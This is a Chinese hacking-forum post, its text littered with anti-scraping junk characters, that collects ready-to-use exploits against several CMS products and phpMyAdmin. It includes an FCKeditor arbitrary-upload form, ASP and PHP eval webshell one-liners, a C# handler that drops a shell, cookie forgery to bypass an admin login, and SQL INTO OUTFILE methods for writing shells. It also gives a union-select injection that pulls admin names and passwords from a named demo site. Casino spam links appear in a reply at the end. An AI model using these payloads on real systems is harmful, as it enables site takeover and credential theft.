9 |/ K$ t$ x. _$ q- `. h' Minurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息( w$ R% [7 S1 I4 `/ {
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------; K  M+ O, W( N' x% j1 V

0 }% ]2 S+ n0 [% O( c( ]! l0 \6 TYxShop易想购物商城4.7.1版本任意文件上传漏洞
: ]) {$ \$ Z1 w
1 F5 k1 B* [+ Q' Ohttp://xxoo.com/controls/fckedit ... aspx/connector.aspx) H/ N- k- u4 p* p7 ]/ x2 U
跳转到网站根目录上传任意文件。
% l$ A  \* h0 t如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件: I8 A2 q- T, w% Z2 J: y
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
$ V$ g# \6 p. ~Upload a new file:<br>
! h2 Q% ^& i6 ?<input type="file" name="NewFile" size="50"><br>
0 o; i  B8 n: H, a$ G<input id="btnUpload" type="submit" value="Upload">
& ^- B6 l7 a2 P, G& C$ \9 v</form>
) E: q5 o4 l6 {) d-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 F) K. b2 R1 s) n
  N, ^& ^7 q/ u, j! x$ `2 \" l4 z
SDcms 后台拿webshell0 x6 \/ S% a2 M

9 B& w3 a$ Q' |第一种方法:0 S! E5 h2 n7 q/ Q/ Y; W
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
0 q5 T* d2 H: u+ f3 W6 w  E4 {把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
' N! {1 B9 t# A1 J# B; i& R用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。2 f$ a1 x, _. W7 s
第二种方法:
8 a+ h# G+ c! a2 U! [8 s0 q进入后台-->系统管理-->系统设置-->系统设置->上传设置;
2 L1 l5 o0 S+ `! B在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
8 {0 ~! ?; A) }+ t& c8 r第三种方法:* |( q& r* M  B& H
进入后台-->界面管理-->模板文件管理-->创建文件1 B' W+ e/ a9 i% y
文件名写入getshell.ashx
* x* W4 w# N7 p4 L! n/ p# q内容写入下面内容:
. ]" |8 W/ L6 L; N. F. c9 O* W1 d0 b/====================复制下面的=========================/3 K$ d  e, G6 M9 d" A
<%@ WebHandler Language="C#" Class="Handler" %>
- V6 u2 Y. p$ ~7 T6 fusing System;& b0 C$ Q% J4 ?7 E# Y
using System.Web;2 I* ]2 a8 K! y: O6 X, S
using System.IO;
; ~% m" }3 l# o" Spublic class Handler : IHttpHandler {3 {& B$ f- v& `- P$ p! f
public void ProcessRequest (HttpContext context) {  y. L$ J$ }+ c* u
context.Response.ContentType = "text/plain";
: P# Z8 n2 W# PStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));5 I' P+ K8 b; D9 A; u
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
. \& j2 Q. k  _" K- }. C: gfile1.Flush();! ]+ F+ i, h7 Z2 @
file1.Close();
  @) `. t4 [0 P+ d" _}
% H- l: L0 z& v. w& m- Upublic bool IsReusable {+ x' M" h6 J% J. U6 t
get {
. ?# J% {" w8 {+ s& A1 greturn false;
9 ]3 ~. v# d* R0 F0 o8 Z}1 X+ _6 ?2 }. ?
}
  R- v" A3 s- v+ P9 r}
2 V+ M8 K/ c9 v/=============================================/! _3 U  z# C5 X& X, l
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
, n* h  q, N% X$ @9 S会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接$ j$ L5 h9 Q5 |6 D6 |. Y
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------( s6 G5 a8 q# S2 K7 r

3 T- ^. Q- R+ Q; qESCMS网站管理系统0day
& \5 b/ D8 s8 W2 f$ n! Z; ~3 F" D" j0 v8 _* d
后台登陆验证是通过admin/check.asp实现的
; n' [$ Y! v' F$ [& r4 m- q! A
$ Y4 q$ k9 Q$ ]首先我们打开http://target.com/admin/es_index.html
: E5 D& Z& h& Z然后在COOKIE结尾加上
- X: z: t1 E2 X' o, b; ESCMS$_SP2=ES_admin=st0p;& _6 l$ L9 d1 m0 b, N
修改,然后刷新
/ l- T3 J2 E9 L& z( ~: q进后台了嘎..; _; M0 `  i7 N, t  Z1 _  v$ D7 \& N8 [
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
! m. _) J% D& V$ e& V( m& K9 j8 P, X& f1 D- q; V
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.0 N! `) D, [* p8 O. \
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp( X" f3 n& Z/ `- R, Z: {* n  L9 z
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..4 T3 W& f$ P+ k: ~. a9 r4 S# x
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了3 m% f, r) ~% T7 g
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* ^. ]9 L! G% p% v3 d1 M  x6 _6 z5 m! K
宁志网站管理系统后台无验证漏洞及修复
" W' N  @  k( ]; G) f2 e
7 ?; E: k" P6 _0 T4 Z9 I7 ^0 P4 _网上搜了一下,好像没有发布.如有雷同纯粹巧合!
7 H1 h/ c2 [. k. C4 Y! M官方网站:www.ningzhi.net! w5 |# m- U+ S4 @
学校网站管理系统 V.2011版本 4 U: I& c, f  `& f1 X
http://down.chinaz.com/soft/29943.htm * Z& ~5 H% T7 F
其它版本(如:政府版等),自行下载.3 W  h( {4 d9 J& _
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~, V0 j% `) o' k& Y% c* i: G6 k
login.asp代码如下:
: u- ^+ m6 e2 }- G) P  J5 @# d% ]<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> # c5 ~- U4 g4 W( @3 ]2 z9 `
manage.asp代码我就不帖出来了.反正也没验证.
. G! e! L- d' X  [# c4 b. j只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
6 |# s# f) E7 C: e2 r/ b" Y& f漏洞利用:- V9 G/ Q. {2 [
直接访问http://www.0855.tv/admin/manage.asp
7 G9 \5 a4 f  U! I数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web53 c5 D( i3 v" i2 @
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) I( f/ T+ \6 k8 ]1 f* m0 W% J6 t8 z. h9 a7 P  X
phpmyadmin拿shell的四种方法总结及修复
$ l5 s; v* j6 z) r. Z  R3 O- B( M3 c, z  Z& {7 o0 Q
方法一:
5 m* ?9 Q6 _4 b' k8 m  A: LCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );) I9 F6 S* n, }- J
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
9 K% I# N& W' Y7 e1 `; Z- XSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
3 }/ m# C8 J2 B& V: Q----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php: k3 K! a: Z' {- P+ R+ q
    一句话连接密码:7on
' j* t% G7 R/ [方法二:& d: N1 T" x% M; M2 @7 b9 O
读取文件内容:    select load_file('E:/xamp/www/s.php');
8 \+ K: {- s1 X+ m! s! ^3 ~写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
/ v" T, F2 K" n2 M+ S  |! ycmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
. t2 v" C2 N/ G+ o% z- f方法三:+ W5 T( [! o* [* }
JhackJ版本 PHPmyadmin拿shell
' w$ h$ W. k7 |Create TABLE study (cmd text NOT NULL);
$ W, u2 Y; d+ M: QInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
7 ?1 d, w# x3 \8 ?9 Uselect cmd from study into outfile 'E:/wamp/www/7.php';
( O* @% y( i/ F/ j9 hDrop TABLE IF EXISTS study;
+ R, x, m! |$ }2 f& `) o0 w# N7 k# z<?php eval($_POST[cmd])?>
1 `9 N' t1 X$ DCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。* t" t  P) X* @1 V! a5 U9 K2 s
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
# g9 E9 Y6 B' j6 q: h8 i' R+ ISELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
2 n8 m5 w% W1 u; S+ JDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
" V3 Z$ O1 z/ w+ j方法四:5 d# q' a+ d; t! |
select load_file('E:/xamp/www/study.php');
: a& ~8 q0 F7 S# _! uselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; u# C( P! n) _! K2 g1 t9 _2 V然后访问网站目录:http://www.2cto.com/study.php?cmd=dir' q6 A  K4 o  b# m  D9 |
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 a& u' I7 f( }. B9 {& j8 A. u* B* E# e
NO.001中学网站管理系统 Build 110628 注入漏洞
, N0 m1 w& m9 d- `" q0 g+ l! K
) F! |7 V' W0 W6 H% }NO.001中学网站管理系统功能模块:
, `! m2 W/ E0 I) {6 d+ U. ~& y) k! H! Q1 m1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
' ]- k8 _8 @% t! R* {6 O* S2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
! i: {# o0 n  _* s( Y. ~' K3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
+ l: y+ d& ?' }* [+ l+ a$ |4.视频图片管理:一级分类,动态添加视频或者图片等信息4 Y. P6 q4 `/ ?: Z- g# A3 C/ Q: i
5.留言管理:对留言,修改,删除、回复等管理
8 }; H3 R4 i  I% L6 z/ v  x+ H( f6.校友频道:包括校友资料excel导出、管理等功能& ?; `: d0 ?( F2 p  h
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页# h0 n9 l4 l& p7 o) }
默认后台:admin/login.asp
: C2 h+ ~0 d7 N3 R- ~1 l官方演示:http://demo.001cms.net9 ?9 e( N6 R* ]. ?6 s  {
源码下载地址:http://down.chinaz.com/soft/30187.htm% P! C4 T, B* G; b: _* \
EXP:7 o: q+ G9 H; [! N
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin4 |  B/ |& z% H
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin% \( J; M( v4 z* G# p+ _" L4 f
getshell:后台有备份,你懂的) t- L4 r( ?- C& z6 k% t7 l: d
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。/ X; U9 S3 X/ b+ A2 D* ~
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表